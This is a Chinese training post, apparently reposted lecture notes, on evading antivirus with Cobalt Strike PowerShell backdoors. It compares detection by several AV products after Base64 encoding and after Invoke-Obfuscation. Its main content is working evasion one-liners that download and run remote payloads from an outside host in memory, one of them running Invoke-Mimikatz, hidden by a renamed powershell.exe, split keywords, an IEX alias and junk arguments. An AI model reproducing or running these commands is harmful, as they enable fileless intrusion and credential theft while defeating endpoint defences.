暂无图片
暂无图片
暂无图片
暂无图片
暂无图片

免杀对抗|Powershell Bypass AV(CS)

小迪安全 2021-10-02
2177

来源于98次直播课件

#知识点:
1、Powershell-代码免杀-混淆加密
2、Powershell-内存免杀-无文件落地
3、Powershell-集合免杀-无文件落地&混淆


以下环境采用CS生成的Powershell后门测评


1、本地执行代码-单编码测评

利用思路:
将Powershell代码中的变量$DoIt进行Base64编码,
后续利用内置函数进行解密执行,替换变量后测评脚本!

厂商
测评结果
某管家
全过
X60
全过
某绒
编码后过
Windows Defender
全不过
总结:
针对Powershell脚本,X60查杀有点让人意外,后面拦截却牛逼哦
系统内置的Defender,直接全干,果然不愧是自家的杀毒对自己的东西真了解

2、本地执行代码-工具混淆器测评

利用思路:
由于Powershell语言大部分都不怎么了解开发编写
这里可以采用别人加好的工具项目进行高强度加密算法
https://github.com/danielbohannon/Invoke-Obfuscation
安装使用:
Import-Module ./Invoke-Obfuscation.psd1
Invoke-Obfuscation
处理文件:set scriptpath 1.ps1
处理代码:set scriptblock 'xxxx'
进入编码:encoding
选择编码:1-8
输出文件:out 11.ps


下图展示对比:加密前&加密后

厂商
测评结果
某管家
全过
X60
全过
某绒
全不过
Windows Defender
全不过
总结:
工具内置8种加密编码算法,按常理应该是都能过,为什么效果反而差?
其实是工具已经被收录到各大杀毒厂商黑名单中,代码写法指纹被识别;
如果有能力更改工具的写法指纹,基本可以全过,学起来哦?哈哈,吃瓜哦~
这里肯定有人问:效果这么差,你讲这个干吊?你可以编码部分防识别不香吗?

3、远程执行代码-无文件&混淆&干扰&替换

利用思路:
由于在横向移动或上线中,执行Powershell,可以采用远程下载执行;
无需将脚本文件传输服务器后在执行,但这种执行会不会被拦截呢?
测评:Powershell在远程调用执行时,如何进行Bypass 行为呢?


原型执行powershell语法:
powershell -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://www.xiaodi8.com/ms/ps/payload.ps1'))"


远程执行:即使文件被杀,也可利用无文件绕过执行(内存执行)
Powershell监控Bypass
1、替换文件名
2、替换关键字
2、垃圾数据干扰


1、替换文件名
copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe bypass.txt
bypass.txt "$a='IEX((New-Object Net.WebClient).DownloadString(''ht';$b='tp://www.xiaodi8.com/ms/ps/1.ps1''));Invoke-Mimikatz';IEX ($a+$b)"


2、替换关键字
powershell "$a='IEX((New-Object Net.WebClient).DownloadString(''ht';$b='tp://www.xiaodi8.com/ms/ps/1.ps1''));Invoke-Mimikatz';IEX ($a+$b)"
powershell -NoExit "$c1='IEX(New-Object Net.WebClient).Downlo';$c2='123(''http://www.xiaodi8.com/ms/ps/payload.ps1'')'.Replace('123','adString');IEX ($c1+$c2)"
3、垃圾数据干扰
powershell -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal set-alias -name key -value IEX; key(New-Object Net.WebClient).DownloadString('ht'+'tp://www.xiaodi8.com/ms/ps/p1.ps1')

总结:
针对Powershell后门,测评结果如下:
代码查杀强度
Windows Defender > 某绒 > X60=某管家
行为查杀强度
Windows Defender=X60 > 某绒 > 某管家

培训请扫码:

国庆特惠价,吃西瓜哦~


文章转载自小迪安全,如果涉嫌侵权,请发送邮件至:contact@modb.pro进行举报,并提供相关证据,一经查实,墨天轮将立刻删除相关内容。

评论